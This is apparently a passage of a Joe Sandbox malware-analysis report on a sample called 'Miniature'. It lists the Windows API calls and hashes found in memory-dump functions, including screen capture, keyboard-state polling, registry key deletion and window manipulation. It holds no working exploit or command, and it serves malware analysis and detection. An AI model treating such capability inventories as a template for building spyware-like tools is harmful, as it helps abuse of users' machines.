                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                            • Opcode ID: c04c267a39cbaf1e8fe806147523c71d5685b39b2952f361599e41cc45009ee7
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ae45e678cfc5886274ab29cd699eaf2c7218d422a8361cc6d0c00125b0f47bc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c04c267a39cbaf1e8fe806147523c71d5685b39b2952f361599e41cc45009ee7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81C18C34208201AFDB10DF54C4C9F6ABBE1BF85318F54859CF4668B6A2CB35ED86DB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C93035
                                                                                                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C93045
                                                                                                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00C93051
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00C9305E
                                                                                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C930CA
                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C93109
                                                                                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C9312D
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C93135
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00C9313E
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00C93145
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00C93150
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                            • Opcode ID: d3e8815093ef0f36f2411f2df5cd436fbc75f66b5b184e5371bc8c2bbff26e19
                                                                                                                                                                                                                                                                                            • Instruction ID: 974bab032cfe5560b237708f276231392bb9e663590f5e23d4d1eb7c73eebd02
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3e8815093ef0f36f2411f2df5cd436fbc75f66b5b184e5371bc8c2bbff26e19
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4961D3B5D00219EFCF14CFA4D888EAEBBB5FF48314F208529E556A7250D771AA41DF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00CAA990
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00CAA9A7
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00CAA9B3
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00CAA9C9
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00CAAC15
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CAAC33
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CAAC54
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00CAAC73
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00CAAC95
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 00CAACBB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 886f2a420031f4db16e4a4a215b91da2a67ec09bb0c0e0f7c353c6056ae220dd
                                                                                                                                                                                                                                                                                            • Instruction ID: 4134a01e9babcddce5fa0049c668ec84613594e913364ee17fa9e18bae7328e9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 886f2a420031f4db16e4a4a215b91da2a67ec09bb0c0e0f7c353c6056ae220dd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23B1BA7060021AEFDF14CF69C9C47AE3BF2BF45718F188069EC559B295D731AA80CB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C752E6
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C75328
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C75339
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C75345
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C7537A
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C753B2
                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C753EB
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C75445
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C75477
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C754EF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                            • Opcode ID: 21e2060b20b2f260a73bd320aea7ad17c461c4e069e5c4a42506ac11573c3dc3
                                                                                                                                                                                                                                                                                            • Instruction ID: 15a23124a5359f6e54ad098fe058456921c6b072aabcb80bdf303682f5818f43
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e2060b20b2f260a73bd320aea7ad17c461c4e069e5c4a42506ac11573c3dc3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB91F971104B06AFD708DF24C895BA9B7B9FF01304F008519FAAE830A1EBB1EE55CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C124B0
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA97B6
                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00CA97C6
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00CA97D1
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00CA9879
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CA992B
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00CA9948
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00CA9958
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CA998A
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CA99CC
                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CA99FD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: e91486d5d9497919a12bda769d450dc889bbab7b13ab5b9f4fd77bd6984103e5
                                                                                                                                                                                                                                                                                            • Instruction ID: e1981461a1b576cbae405a5d5cf2425c63d51a0fef1136b803a647b12708b70c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e91486d5d9497919a12bda769d450dc889bbab7b13ab5b9f4fd77bd6984103e5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9081B071504312AFD710CF25C886BAF7BE8FB8A318F10091DF99697291DB74DA05DBA2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00CE29C0,000000FF,00000000,00000030), ref: 00C7C973
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00CE29C0,00000004,00000000,00000030), ref: 00C7C9A8
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 00C7C9BA
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00C7CA00
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00C7CA1D
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00C7CA49
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C7CA90
                                                                                                                                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7CAD6
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7CAEB
                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C7CB0C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 8840770f733ad4c8fba35297e1dae93f401fd877b45bbf3629d63ea382a7f566
                                                                                                                                                                                                                                                                                            • Instruction ID: e27ad66d7ac9c6d646d147b2f858479b580d45c2bce69b0f2b407e729be1f5c7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8840770f733ad4c8fba35297e1dae93f401fd877b45bbf3629d63ea382a7f566
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE6180B090024AAFDF11CF64D8C9BEE7BB9FB05358F048059F96AA3251D734AE11DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C7E4D4
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C7E4FA
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7E504
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00C7E554
                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C7E570
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                            • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                            • Opcode ID: eb1030a167e1a9b859c6b8591e009b969f7a431dab456e2af0252fabcb3efd85
                                                                                                                                                                                                                                                                                            • Instruction ID: b3dcc6a4a3335e4b7ce80d9bb02370c745fd4a8a4c4fafe80bbcf9fbc68f0001
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1030a167e1a9b859c6b8591e009b969f7a431dab456e2af0252fabcb3efd85
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 234133735102187AEB00AB649C47FFF776CEF56724F10406AF906E6192FB74AA01B2A5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9D6C4
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C9D6ED
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9D7A8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C9D70A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C9D71D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C9D72F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C9D765
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9D788
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C9D753
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                            • Opcode ID: 79ed6d599bb95c6655f993e11131b7b0845df03c4b176e808028386329863ae6
                                                                                                                                                                                                                                                                                            • Instruction ID: fc73b5214fd1c2c63d84812eed85b02534ffc39016abb244e58dec21f3cf50fa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79ed6d599bb95c6655f993e11131b7b0845df03c4b176e808028386329863ae6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46315872A01129BBDB219BA1DC8CFEFBB7CEF46714F000165F917E3244DA349E459AA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00C7EFCB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2F215: timeGetTime.WINMM(?,?,00C7EFEB), ref: 00C2F219
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C7EFF8
                                                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00C7F01C
                                                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C7F03E
                                                                                                                                                                                                                                                                                            • SetActiveWindow.USER32 ref: 00C7F05D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C7F06B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C7F08A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00C7F095
                                                                                                                                                                                                                                                                                            • IsWindow.USER32 ref: 00C7F0A1
                                                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 00C7F0B2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                            • Opcode ID: a426835167259bc8184cee10e8014d4fecc358f58561bbe26cf8f950e5d780b9
                                                                                                                                                                                                                                                                                            • Instruction ID: 47c1a1358cec3a5abdc7e70cc99a1222634ac80344c36321670200248c7a6a98
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a426835167259bc8184cee10e8014d4fecc358f58561bbe26cf8f950e5d780b9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7217CB1500284BFEB116F70ACC9B2E7BADF74A749F008069F50B87672CB719D029A11
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C7F374
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C7F38A
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C7F39B
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C7F3AD
                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7F3BE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                            • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                            • Opcode ID: 839f06f82355339acad970d5e7cd75b9d94fcf157b9fd3ef6c85cc86206bea4d
                                                                                                                                                                                                                                                                                            • Instruction ID: cdcb5bd98668026453a6f79c6afa3db115bce1a104da81512a7f18d5d78ddb1d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 839f06f82355339acad970d5e7cd75b9d94fcf157b9fd3ef6c85cc86206bea4d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7811E332A8022879D720B3629C5AEFFAA7CEBC2B00F40053F7511E20E0EAB05D46D5B0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7A9D9
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C7AA44
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C7AA64
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00C7AA7B
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C7AAAA
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00C7AABB
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C7AAE7
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00C7AAF5
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C7AB1E
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00C7AB2C
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C7AB55
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00C7AB63
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7d866bcb9a7f687671dff22393e724cbb8ea841c478936d55c4a8ddbcfa5362d
                                                                                                                                                                                                                                                                                            • Instruction ID: fc1a43b9a044b4bd2d2b588f74f4080572661f2677ea99668252b21dcf5aa25e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d866bcb9a7f687671dff22393e724cbb8ea841c478936d55c4a8ddbcfa5362d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3551D470A047842AEB35D7708850BAEBFB59F82384F08C599D5DA5B1C2DA649B4CCB63
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00C76649
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C76662
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C766C0
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00C766D0
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00C766E2
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C76736
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C76744
